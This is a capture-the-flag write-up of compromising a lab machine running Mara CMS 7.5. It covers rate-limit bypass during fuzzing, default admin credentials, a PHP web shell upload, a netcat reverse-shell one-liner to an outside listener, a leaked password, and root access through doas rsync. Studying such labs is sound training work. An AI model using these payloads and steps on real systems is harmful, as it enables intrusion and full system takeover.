# Tasks
1. Number that revealed the path
2. Name of path
3. CMS name
4. CMS version
5. user flag
6. root flag

# NMAP SCAN
```nmap
PORT     STATE SERVICE VERSION  
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)  
|   256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)  
|_  256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)  
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))  
|_http-title: Susta  
|_http-server-header: Apache/2.4.18 (Ubuntu)  
8085/tcp open  http    Gunicorn 20.0.4  
|_http-title: Spinner  
|_http-server-header: gunicorn/20.0.4  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Findings
## Web (Port 80)
- No robots.txt, looks like a static page.
- We can navigate to `/YouGotTh3P@th` after finding it on 8085
- Site is using Mara CMS
`_Requires: Apache 2.x webserver with php5.2 or later. Most commercial hosting accounts will meet these requirements._`
- If we search `Mara CMS php 5.2`, we get version `7.5`
## Web (Port 8085)
- A spin game, and there is a input to test if your number is lucky enough. We can try and fuzz the number.
```http
POST / HTTP/1.1
Host: 10.10.99.78:8085
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://10.10.99.78:8085
DNT: 1
Connection: close
Referer: http://10.10.99.78:8085/
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

number=1
```
- If we fuzz too fast, the application will add a rate-limiting header, to bypass this use 
`X-Remote-Addr: 127.0.0.1`
- After a while we get a different length of response at `10921`. Checking the response it returns a path.
`path: /YouGotTh3P@th`

# Foothold
- [File Upload](https://infosecwriteups.com/cve-2020-25042-mara-cms-7-5-arbitrary-file-upload-exploit-writeup-9addb36e0f95)
- [Remote Code Execution Authenticated](https://www.exploit-db.com/exploits/48780)
- We can login using default credentials as administrator
`admin:changeme`
- I created another user for myself as adminstrator
`test:test`
- We can now upload files to the server. We can upload a webshell.php for remote code execution.
```php
<?php system($_GET["cmd"]); ?>
```
- File is uploaded to `/img`
`http://10.10.99.78/YouGotTh3P@th/img/webshell.php?cmd=whoami`
`www-data`
- We have RCE. Now need a shell.
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f`
```bash
listening on [any] 9001 ...  
connect to [10.17.1.163] from (UNKNOWN) [10.10.99.78] 46696  
sh: 0: can't access tty; job control turned off
```
# Privilege Escalation
- One user which is kiran
- www-data needs a password
- Found unusual backup in /var/backup
`-r--r--r--  1 root root     1722 Dec  6  2020 .bak.passwd`
- Found possible credentials
`kiran:x:1002:1002:trythispasswordforuserkiran:/home/kiran:`
`kiran:trythispasswordforuserkiran`
- kiran cannot run sudo
- After checking out, a writeup I'm supposed to find a doas.conf in my output, linpeas didn't find it. After looking around I found it in `/usr/local/etc`
`permit nopass kiran as root cmd rsync`
- So apparently we can run `doas rsync` as user root without a password.
- Checking out GTFObins.
```bash
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
```
- Let's run it with doas but as user root
```bash
doas -u root rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
```